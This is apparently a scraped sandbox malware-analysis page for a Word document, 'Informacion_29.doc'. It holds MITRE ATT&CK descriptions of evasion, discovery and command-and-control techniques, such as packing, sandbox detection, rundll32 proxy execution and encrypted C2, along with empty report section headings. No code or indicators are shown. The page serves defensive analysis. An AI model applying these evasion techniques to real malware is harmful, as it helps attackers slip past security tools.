Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Informacion_29.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Informacion_29.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Jwq9b1lb0hmm7, Stream Size: 14416

General

VBA Code Keywords

VBA Code

VBA File Name: Ouz_y28f7ehnqn, Stream Size: 1113

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre